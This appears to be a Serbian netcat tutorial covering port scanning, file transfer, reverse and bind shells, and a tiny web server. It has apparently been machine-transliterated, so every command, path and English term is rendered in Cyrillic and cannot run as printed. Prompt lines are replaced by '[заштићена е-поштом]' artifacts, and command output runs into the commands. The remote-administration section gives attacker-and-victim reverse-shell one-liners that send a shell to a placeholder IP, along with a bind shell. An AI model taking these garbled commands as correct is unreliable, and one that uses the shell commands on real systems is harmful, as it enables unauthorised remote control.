Phenquestions
Кратка разлика између нетцат-традитионал и нетцат-опенбсд
За Нетцат су доступна два слична пакета са малом разликом између њих.
нетцат-традиционални укључује додатну опцију '-е' која се може користити за везивање програма (тј.е басх) са нетцат. Ова функција је врло корисна у сврхе даљинског администрирања.
нетцат-опенбсд имају додатну подршку за ИПв6 и проксије.
Инсталација Нетцат-а
Иако је нетцат унапред инсталиран у већини Линук дистрибуција, али ако није, лако се може инсталирати помоћу следећих наредби.
За традиционални пакет,
[заштићен е-поштом]: ~ $ судо апт-гет инсталл нетцат-традитионалЗа верзију опенбсд,
[заштићен е-поштом]: ~ $ судо апт-гет инсталл нетцат-опенбсдНетцат за Виндовс можете преузети овде хттпс: // соурцефорге.нет / пројецтс / нц110 / филес /.
Сада ћемо истражити неке занимљиве примере употребе нетцат-а
Скенирање порта помоћу нетцат-а
Да бисте скенирали отворене портове, користите опцију -з. Нетцат ће покушати да се повеже на сваки порт без слања података или врло ограничених података у УДП случају. Откуцајте следеће
[заштићена е-поштом]: ~ $ нц -з -в хацкме.орг 80... снип ..
хацкме.орг [217.78.1.155] 80 (хттп) отворено
Да бисте скенирали низ портова, откуцајте
[заштићена е-поштом]: ~ $ нц -з -нв 192.168.100.72 20-80(НЕПОЗНАТО) [192.168.100.72] 80 (хттп) отворено
(НЕПОЗНАТО) [192.168.100.72] 22 (ссх) отворено
Пренос датотека помоћу нетцат-а
Још један користан случај употребе нетцат је пренос датотека између удаљених рачунара. Текст и бинарне датотеке можете слати са једног рачунара на други. Покушаћемо да пошаљемо датотеку „датотека.пдф ”са Линук ПЦ-а на Виндовс ПЦ [ИП 192.168.100.72] користећи нетцат као пример.
На Виндовс машини (пријемнику) откуцајте следеће
Ц: \ Корисници> нц -нвлп 1337> датотека.пдфСлушање на [0.0.0.0] (породица 2, лука 1337)
На Линук машини (пошиљаоцу) откуцајте следеће
[емаил заштићен]: ~ $ нц -нв 192.168.100.72 1337 < file.pdfВеза на 192.168.100.72 1337 порт [тцп / *] је успео!
Удаљена администрација са нетцат-ом
Један од најбољих случајева употребе нетцат-а је даљинско администрирање, што значи да можете да контролишете туђи рачунар помоћу нетцат-а. Нетцат-традиционални долази са опцијом '-е' која се може користити за везивање програма (тј.е цмд.еке у Виндовс-у или басх у Линук-у) са портом, то значи да ће нетцат деловати као комуникатор између програма и удаљеног рачунара. Нетцат ће примати команде са удаљеног рачунара, извршавати се на локалном систему и слати резултате натраг на удаљени рачунар. Ова функција се широко користи у злонамерне сврхе, како би се заштитили бекери на рачунарима и серверима. Ова функција је доступна само на нетцат-традиционалном, али уз мали трик, нетцат-опенбсд се такође може користити у исту сврху. Можете користити два начина за управљање рачунаром других.
У а Обрнута љуска везе, нападач ослушкује порт и чека да се веза пошаље са рачунара жртве. Користи се када је жртвин рачунар иза НАТ-а или нема јавни ИП.
Да бисте добили обрнуту љуску помоћу нетцат-а, потребно је да преслушате порт помоћу нетцат-а. Откуцајте следеће на рачунару нападача,
[заштићена е-поштом]: ~ $ нц -нвлп 1337Слушање на [0.0.0.0] (породица 2, лука 1337)
На машини за жртве (ако нетцат-традиционални је инсталиран)
// заменити „/ бин / басх“ са „цмд.еке “у случају Виндовс-а
[заштићена е-поштом]: ~ $ нц -нв [ИП_АДДР] 1337 -е / бин / басхЗа нетцат-опенбсд (где опција „-е“ није подржана)
[заштићена е-поштом]: ~ $ рм / тмп / ф; мкфифо / тмп / ф; кат/ тмп / ф | / бин / сх -и 2> & 1 | нц [ИП_АДДР] 1337> / тмп / ф
Док је у Бинд Схелл везе, нападач веже порт на рачунару жртве и повезује се на тај порт помоћу клијентске утичнице. Користи се када је нападачка машина иза НАТ-а или нема јавну ИП адресу.
На машини за жртве откуцајте
[заштићена е-поштом]: ~ $ нц -нлвп 1337 -е / бин / басхслушам [било који] 1337…
Сада, да бисте покренули команде на рачунару жртве, откуцајте
[заштићена е-поштом]: ~ $ нц -нв 127.0.0.1 1337Веза на 127.0.0.1 1337 порт [тцп / *] је успео!
$ ид
уид = 1000 (азад) гид = 1000 (азад) групе = 1000 (азад), 4 (адм), 24 (цдром), 27 (судо),
30 (дип), 46 (плугдев), 118 (лпадмин), 129 (самбасхаре)
Једноставан веб сервер који користи нетцат
Такође можете учинити још један једноставан трик да Нетцат користите као минимални веб сервер са једном страницом. Овај веб сервер био би врло једноставан без посебних конфигурација и користићемо га за слање нашег ХТМЛ кода у прегледач.
[емаил заштићен]: ~ $ вхиле труе; до ецхо -е "ХТТП / 1.1 200 ОК \ н \ н $ (ецхо "
Мој једноставни веб сервер који користи нетцат
")" | нц -нвлп 1337; ГотовоСлушање на [0.0.0.0] (породица 2, лука 1337)
Сада покушајте да преузмете веб страницу помоћу цурл-а
[заштићена е-поштом]: ~ $ цурл хттп: // 127.0.0.1: 1337 /Мој једноставни веб сервер који користи нетцат
Наведите временско ограничење за нетцат сесију
Можете одредити временско ограничење за нетцат сесију помоћу опције -в. Нетцат ће аутоматски прекинути везу са сесијом након што прође одређено време.
// -в [Време у секундама][заштићена е-поштом]: ~ $ нц -в 40 -нвлп 1337
Слушање на [0.0.0.0] (породица 2, лука 1234)
Наставите са слушањем чак и ако клијент прекине везу
У нормалном режиму, нетцат сервер се искључује и престаје да слуша порт када клијент затвори везу. Сервер можете држати горе користећи опцију -к
[заштићена е-поштом]: ~ $ нц -к -нлвп 1234Слушање на [0.0.0.0] (породица 2, лука 1234)
Закључак
Нетцат је једноставан, али ефикасан услужни програм који се може користити за пуно једноставних свакодневних задатака. Долази прединсталиран у скоро сваки УНИКС попут оперативних система и може се користити за разне задатке попут комуникације између два рачунара, преноса датотека и многих других.
